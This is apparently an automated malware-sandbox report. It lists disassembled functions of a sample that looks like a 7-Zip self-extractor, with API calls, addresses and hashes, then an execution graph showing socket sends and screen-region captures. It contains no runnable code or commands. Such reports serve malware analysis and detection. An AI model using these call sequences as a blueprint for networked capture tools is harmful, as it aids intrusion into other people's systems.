                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                                                            • String ID:
                                                                            • API String ID: 3043669009-0
                                                                            • Opcode ID: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                            • Instruction ID: 5c7c764d92766e680c666047e1d2b266a9282aef260ce17b2660fed0a98cdec4
                                                                            • Opcode Fuzzy Hash: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                            • Instruction Fuzzy Hash: 62118672E40314ABCB10EBA9DC09FDE77BCEB84714F10446BB652E72D0DAB8A9018B54
                                                                            Function 0040709B Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
                                                                            • GetSystemMetrics.USER32(00000031), ref: 004070E8
                                                                            • CreateFontIndirectW.GDI32(?), ref: 004070F7
                                                                            • DeleteObject.GDI32(00000000), ref: 00407126
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                            • String ID:
                                                                            • API String ID: 1900162674-0
                                                                            • Opcode ID: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                            • Instruction ID: 550de309380991ebf2cc5542bfcce979d3dc35c4f0fc859f263023f0ef030489
                                                                            • Opcode Fuzzy Hash: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                            • Instruction Fuzzy Hash: E4112475A00205EFDB109F94DC88BEA77B8EB44300F0081AAE915A7391DB74AD44CF94
                                                                            Function 00408576 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ScreenToClient.USER32(?,?), ref: 004085B0
                                                                            • GetClientRect.USER32(?,?), ref: 004085C2
                                                                            • PtInRect.USER32(?,?,?), ref: 004085D1
                                                                              • Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6
                                                                            • CallNextHookEx.USER32(?,?,?), ref: 004085F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ClientRect$CallHookKillNextScreenTimer
                                                                            • String ID:
                                                                            • API String ID: 3015594791-0
                                                                            • Opcode ID: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                            • Instruction ID: e461164be05bcb912302e6f3c507a6476d35c8a33c6b54d2dcb30444e6ba8619
                                                                            • Opcode Fuzzy Hash: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                            • Instruction Fuzzy Hash: 53018732110109EBDB15AF65DE44AEA7BA6BB18340B04803EE946A62A1DB34EC01DB49
                                                                            Function 0040411C Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                              • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
                                                                            • SetWindowTextW.USER32(?,?), ref: 0040417D
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404188
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@TextWindow$Length
                                                                            • String ID:
                                                                            • API String ID: 2308334395-0
                                                                            • Opcode ID: bf2f9251983c8e4603f27720dbecbe6c862c4942a19ddc0db16871e0d016537d
                                                                            • Instruction ID: 4b6459f0461bbe798f755719163b862091937496e8852bb980e1e24ac321b0cc
                                                                            • Opcode Fuzzy Hash: bf2f9251983c8e4603f27720dbecbe6c862c4942a19ddc0db16871e0d016537d
                                                                            • Instruction Fuzzy Hash: 88F0FF72D00108BACF01BBA1DD47CDE7B78AF18349F50406AF515721A1EA359B959B98
                                                                            Function 00407916 Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetObjectW.GDI32(?,0000005C,?), ref: 00407931
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00407947
                                                                            • GetDlgItem.USER32(?,000004B5), ref: 0040795B
                                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFontIndirectItemMessageObjectSend
                                                                            • String ID:
                                                                            • API String ID: 2001801573-0
                                                                            • Opcode ID: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                            • Instruction ID: 7a034716ce128e2868931ba3036e49d2ca07d686104c333d304994eb71a954cf
                                                                            • Opcode Fuzzy Hash: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                            • Instruction Fuzzy Hash: B4F05476900704EBE7205BA4DD49FCB7BADAB88B01F108135F911F52D4DBB4E4018B69
                                                                            Function 00401D8D Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 00401D92
                                                                            • GetWindowRect.USER32(?,?), ref: 00401DAB
                                                                            • ScreenToClient.USER32(00000000,?), ref: 00401DB9
                                                                            • ScreenToClient.USER32(00000000,?), ref: 00401DC0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ClientScreen$ParentRectWindow
                                                                            • String ID:
                                                                            • API String ID: 2099118873-0
                                                                            • Opcode ID: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                            • Instruction ID: c9a7d6158b24b89f480d793c87918ffc8905022d7cd2aff0562fad3402b16060
                                                                            • Opcode Fuzzy Hash: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                            • Instruction Fuzzy Hash: 6BE08C73604226ABD7109BA6FC88CCBBFADEFD5762700447AF945A2220C7349C109AB5
                                                                            Function 00411F01 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 480COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID: (nA${D@
                                                                            • API String ID: 613200358-2741945119
                                                                            • Opcode ID: 1e0df42129a71c755aa499faf77b433d37237b934c8390ca0221971e75c2e4af
                                                                            • Instruction ID: 2f127b0a99b440bb22087229e66332d50aa0d3dd2037016e8eed2c3918cb49fd
                                                                            • Opcode Fuzzy Hash: 1e0df42129a71c755aa499faf77b433d37237b934c8390ca0221971e75c2e4af
                                                                            • Instruction Fuzzy Hash: 8C222771900248DFCB24EF65C9909EEBBB5FF08304F50452FE92A97261DB78A995CF48
                                                                            Function 00411C05 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36
                                                                              • Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                              • Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                              • Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$??3@$memmove
                                                                            • String ID: {D@
                                                                            • API String ID: 4294387087-1160549682
                                                                            • Opcode ID: 006456e1978721f3553438c475323fd4f4958cf9040aa5a49b28c9fd5e78c511
                                                                            • Instruction ID: 87b977b41272fa9bbbce8bbb083323c071bac7afc4455a16ffe75f8a4777ec8d
                                                                            • Opcode Fuzzy Hash: 006456e1978721f3553438c475323fd4f4958cf9040aa5a49b28c9fd5e78c511
                                                                            • Instruction Fuzzy Hash: 77B1C471900249DFCB14EFAAD8919DDBBB5FF08304F60412EF919A7261DB38A985CF94
                                                                            Function 004042EA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: _wtol
                                                                            • String ID: GUIFlags$^L@
                                                                            • API String ID: 2131799477-2609156739
                                                                            • Opcode ID: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                            • Instruction ID: e071545e6e42b97a6ff0e24219ab621184b159c44f090b8d4e9d319f90212361
                                                                            • Opcode Fuzzy Hash: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                            • Instruction Fuzzy Hash: 02F04FB521412386D7342A0995103F7B298EBD47A2FD46437EFC3A21D0C37C4C83926D
                                                                            Function 00407EBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@wsprintf
                                                                            • String ID: (%d%s)
                                                                            • API String ID: 3815514257-2087557067
                                                                            • Opcode ID: e9ddc36d7176216f8ad89ff6ca0f705d2026cce2760dcc66f26196aa05fb3aae
                                                                            • Instruction ID: 7ae1222ccb27522ee32bda146f0754d3921d44b98735208d9557fe66e55c1055
                                                                            • Opcode Fuzzy Hash: e9ddc36d7176216f8ad89ff6ca0f705d2026cce2760dcc66f26196aa05fb3aae
                                                                            • Instruction Fuzzy Hash: 2FF09671D00218BFDF21BB55DC46EDEB778EF00308F1081BBB552B15E2DA75AA44CA98
                                                                            Function 004030EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                            • GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: TextWindow$Length
                                                                            • String ID: t1@
                                                                            • API String ID: 1006428111-473456572
                                                                            • Opcode ID: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                            • Instruction ID: 8fdd6815b78bf9020f8e78ba054009a9d995117c016d7113bd8aebbbabd1b082
                                                                            • Opcode Fuzzy Hash: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                            • Instruction Fuzzy Hash: 6FE06D3A204612AFC311AF19D84486FBBBAFFD4311B00447AF841D72A1CB34DC158B90
                                                                            Function 00404464 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: 7-Zip SFX$Could not allocate memory
                                                                            • API String ID: 2030045667-3806377612
                                                                            • Opcode ID: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                            • Instruction ID: 20c12d322158c288d9879b49a54fb0f602392e899c52d42c128a52a7ce83e7b7
                                                                            • Opcode Fuzzy Hash: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                            • Instruction Fuzzy Hash: 79B012703C130C75D50003608C07FC010400B48F03F130412B924E80C1D5E480D0700C

                                                                            Execution Graph

                                                                            Execution Coverage:3.1%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:10.3%
                                                                            Total number of Nodes:1054
                                                                            Total number of Limit Nodes:37
                                                                            execution_graph 23194 7ff6c2bb5000 71 API calls free 23195 7ff6c2bb3600 9 API calls _getdrive 23197 7ff6c2b90e00 82 API calls 3 library calls 23200 7ff6c2b8a600 100 API calls _RunAllParam 23204 7ff6c2b95203 16 API calls _getdrive 23206 7ff6c2b84200 121 API calls 2 library calls 23207 7ff6c2b81000 70 API calls free 23208 7ff6c2b94c10 137 API calls 4 library calls 23210 7ff6c2b93210 18 API calls _getdrive 23211 7ff6c2b90010 74 API calls free 22271 7ff6c2b9e610 22272 7ff6c2c392a4 __wtomb_environ 70 API calls 22271->22272 22273 7ff6c2b9e67f CreateRectRgn 22272->22273 22274 7ff6c2c392a4 __wtomb_environ 70 API calls 22273->22274 22275 7ff6c2b9e6a3 CreateRectRgn 22274->22275 22276 7ff6c2c392a4 __wtomb_environ 70 API calls 22275->22276 22277 7ff6c2b9e6c7 CreateRectRgn 22276->22277 22348 7ff6c2b83730 22277->22348 22279 7ff6c2b9f70d 22280 7ff6c2b83730 _RunAllParam 89 API calls 22279->22280 22281 7ff6c2b9f725 22280->22281 22283 7ff6c2b83730 _RunAllParam 89 API calls 22281->22283 22282 7ff6c2b9e740 Sleep 22340 7ff6c2b9e752 22282->22340 22285 7ff6c2b9f741 DeleteObject 22283->22285 22284 7ff6c2b9e773 EnterCriticalSection 22325 7ff6c2b9e70a _RunAllParam 22284->22325 22286 7ff6c2c38bf4 free 70 API calls 22285->22286 22287 7ff6c2b9f760 DeleteObject 22286->22287 22288 7ff6c2c38bf4 free 70 API calls 22287->22288 22289 7ff6c2b9f773 DeleteObject 22288->22289 22291 7ff6c2c38bf4 free 70 API calls 22289->22291 22290 7ff6c2b9eab4 DeleteObject 22292 7ff6c2c38bf4 free 70 API calls 22290->22292 22297 7ff6c2b9f786 22291->22297 22292->22325 22293 7ff6c2b9ead7 DeleteObject 22298 7ff6c2c38bf4 free 70 API calls 22293->22298 22294 7ff6c2b9e8cb DeleteObject 22299 7ff6c2c38bf4 free 70 API calls 22294->22299 22295 7ff6c2b9e8ee DeleteObject 22302 7ff6c2c38bf4 free 70 API calls 22295->22302 22305 7ff6c2c37220 _getdrive 8 API calls 22297->22305 22298->22325 22299->22325 22300 7ff6c2b9eafa DeleteObject 22301 7ff6c2c38bf4 free 70 API calls 22300->22301 22301->22325 22302->22325 22303 7ff6c2b9e9a6 GetRgnBox 22303->22325 22304 7ff6c2b9e911 DeleteObject 22308 7ff6c2c38bf4 free 70 API calls 22304->22308 22309 7ff6c2b9f7a2 22305->22309 22307 7ff6c2c175c0 104 API calls 22307->22325 22308->22325 22310 7ff6c2b9e7e6 GetRgnBox 22310->22325 22311 7ff6c2b9f704 LeaveCriticalSection 22311->22279 22313 7ff6c2c17400 97 API calls 22313->22325 22314 7ff6c2b9e9f3 GetRgnBox 22314->22325 22316 7ff6c2b9e833 GetRgnBox 22316->22325 22318 7ff6c2c392a4 __wtomb_environ 70 API calls 22323 7ff6c2b9ebb3 CreateRectRgn CombineRgn 22318->22323 22319 7ff6c2bed440 16 API calls 22319->22325 22320 7ff6c2b9f6b8 SetRectRgn 22327 7ff6c2b9f6da LeaveCriticalSection Sleep 22320->22327 22322 7ff6c2b9ea40 GetRgnBox 22322->22325 22330 7ff6c2b9ec05 22323->22330 22325->22279 22325->22282 22325->22284 22325->22290 22325->22293 22325->22294 22325->22295 22325->22300 22325->22304 22325->22307 22325->22311 22325->22313 22325->22318 22325->22319 22325->22320 22328 7ff6c2c392a4 __wtomb_environ 70 API calls 22325->22328 22331 7ff6c2b9f60b GetTickCount 22325->22331 22333 7ff6c2c392a4 __wtomb_environ 70 API calls 22325->22333 22334 7ff6c2b83730 89 API calls _RunAllParam 22325->22334 22325->22340 22344 7ff6c2bed710 15 API calls 22325->22344 22347 7ff6c2becc40 91 API calls 22325->22347 22352 7ff6c2b8f840 73 API calls __wtomb_environ 22325->22352 22353 7ff6c2b8f840 73 API calls __wtomb_environ 22325->22353 22354 7ff6c2b8f840 73 API calls __wtomb_environ 22325->22354 22355 7ff6c2b8f840 73 API calls __wtomb_environ 22325->22355 22356 7ff6c2b8f840 73 API calls __wtomb_environ 22325->22356 22357 7ff6c2b8f840 73 API calls __wtomb_environ 22325->22357 22359 7ff6c2bed600 14 API calls 22325->22359 22368 7ff6c2beded0 8 API calls 2 library calls 22325->22368 22369 7ff6c2baa580 99 API calls _RunAllParam 22325->22369 22326 7ff6c2b9e87c GetRgnBox 22326->22325 22327->22325 22329 7ff6c2b9f702 22327->22329 22332 7ff6c2b9efdf CreateRectRgn CombineRgn DeleteObject 22328->22332 22329->22279 22335 7ff6c2b9ec20 SetEvent 22330->22335 22358 7ff6c2ba8e00 120 API calls 22330->22358 22360 7ff6c2bedd90 22331->22360 22338 7ff6c2c38bf4 free 70 API calls 22332->22338 22339 7ff6c2b9f120 CreateRectRgn CombineRgn DeleteObject 22333->22339 22334->22325 22335->22330 22338->22325 22343 7ff6c2c38bf4 free 70 API calls 22339->22343 22340->22282 22340->22320 22340->22325 22340->22327 22341 7ff6c2b9ec4a DeleteObject 22345 7ff6c2c38bf4 free 70 API calls 22341->22345 22343->22325 22344->22325 22345->22325 22347->22325 22349 7ff6c2b83765 22348->22349 22350 7ff6c2b83746 22348->22350 22349->22325 22350->22349 22370 7ff6c2bd3740 89 API calls 3 library calls 22350->22370 22352->22310 22353->22316 22354->22326 22355->22303 22356->22314 22357->22322 22358->22341 22359->22325 22361 7ff6c2bede3d 22360->22361 22365 7ff6c2beddd4 22360->22365 22362 7ff6c2c37220 _getdrive 8 API calls 22361->22362 22364 7ff6c2bedea6 22362->22364 22363 7ff6c2beddf0 select 22363->22365 22364->22340 22365->22361 22365->22363 22366 7ff6c2bede55 __WSAFDIsSet 22365->22366 22366->22365 22367 7ff6c2bede67 send 22366->22367 22367->22365 22368->22325 22369->22325 22370->22349 23212 7ff6c2b9da10 82 API calls 2 library calls 23215 7ff6c2bd7e10 20 API calls _getdrive 23218 7ff6c2baa420 15 API calls _getdrive 23220 7ff6c2b8d820 8 API calls _RunAllParam 23223 7ff6c2ba1620 150 API calls 5 library calls 23224 7ff6c2c3c034 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 23225 7ff6c2bb3430 201 API calls 23228 7ff6c2b8a830 91 API calls 2 library calls 23229 7ff6c2ba4003 257 API calls 3 library calls 22634 7ff6c2becbc0 22635 7ff6c2becbdc socket 22634->22635 22636 7ff6c2becbd7 22634->22636 22638 7ff6c2becbf3 22635->22638 22639 7ff6c2becbfb setsockopt 22635->22639 22652 7ff6c2becc40 22636->22652 22639->22638 22640 7ff6c2becc20 22639->22640 22643 7ff6c2becf90 setsockopt 22640->22643 22644 7ff6c2bed08a getsockname getpeername 22643->22644 22645 7ff6c2becff9 setsockopt 22643->22645 22646 7ff6c2bed109 SetPerTcpConnectionEStats 22644->22646 22649 7ff6c2bed137 22644->22649 22647 7ff6c2bed022 WSAIoctl 22645->22647 22648 7ff6c2bed01d 22645->22648 22646->22649 22647->22644 22648->22644 22650 7ff6c2c37220 _getdrive 8 API calls 22649->22650 22651 7ff6c2becc28 22650->22651 22653 7ff6c2becc4f 22652->22653 22656 7ff6c2becc87 22652->22656 22654 7ff6c2b83730 _RunAllParam 89 API calls 22653->22654 22655 7ff6c2becc67 shutdown closesocket 22654->22655 22655->22656 22656->22635 23235 7ff6c2ba4003 263 API calls 3 library calls 23236 7ff6c2b847c0 12 API calls 23237 7ff6c2b855c0 LeaveCriticalSection 23240 7ff6c2b91bd0 FreeLibrary 23241 7ff6c2b8f7d0 DeleteObject 23242 7ff6c2ba4003 250 API calls 2 library calls 22371 7ff6c2b9f7d0 22372 7ff6c2b9f80d 22371->22372 22373 7ff6c2b9f803 22371->22373 22380 7ff6c2c17a70 22372->22380 22377 7ff6c2ba84f0 22373->22377 22375 7ff6c2b9f816 22391 7ff6c2ba8590 22377->22391 22379 7ff6c2ba8504 22379->22372 22389 7ff6c2c17a8a 22380->22389 22381 7ff6c2c17b0a 22384 7ff6c2c17b17 CloseHandle 22381->22384 22385 7ff6c2c17b3d DeleteCriticalSection 22381->22385 22382 7ff6c2c17ae5 CloseHandle 22382->22381 22383 7ff6c2c17aef GetLastError 22382->22383 22386 7ff6c2c42950 RaiseException 22383->22386 22384->22385 22387 7ff6c2c17b21 GetLastError 22384->22387 22386->22381 22388 7ff6c2c42950 RaiseException 22387->22388 22390 7ff6c2c17b3c 22388->22390 22389->22381 22389->22382 22390->22385 22392 7ff6c2b83730 _RunAllParam 89 API calls 22391->22392 22393 7ff6c2ba85d2 22392->22393 22394 7ff6c2ba8628 22393->22394 22395 7ff6c2ba8612 22393->22395 22396 7ff6c2ba85eb SendMessageA WaitForSingleObject 22393->22396 22397 7ff6c2ba8656 22394->22397 22398 7ff6c2c38bf4 free 70 API calls 22394->22398 22395->22394 22421 7ff6c2b94110 22395->22421 22396->22395 22399 7ff6c2b83730 _RunAllParam 89 API calls 22397->22399 22403 7ff6c2ba867e _RunAllParam 22397->22403 22398->22397 22399->22403 22400 7ff6c2ba8757 22401 7ff6c2ba8768 22400->22401 22402 7ff6c2c38bf4 free 70 API calls 22400->22402 22404 7ff6c2c38bf4 free 70 API calls 22401->22404 22405 7ff6c2ba8779 22401->22405 22402->22401 22403->22400 22424 7ff6c2bea220 FindWindowExA GetWindowThreadProcessId GetCurrentProcessId 22403->22424 22404->22405 22408 7ff6c2ba87b5 FreeLibrary 22405->22408 22411 7ff6c2ba87bc _RunAllParam 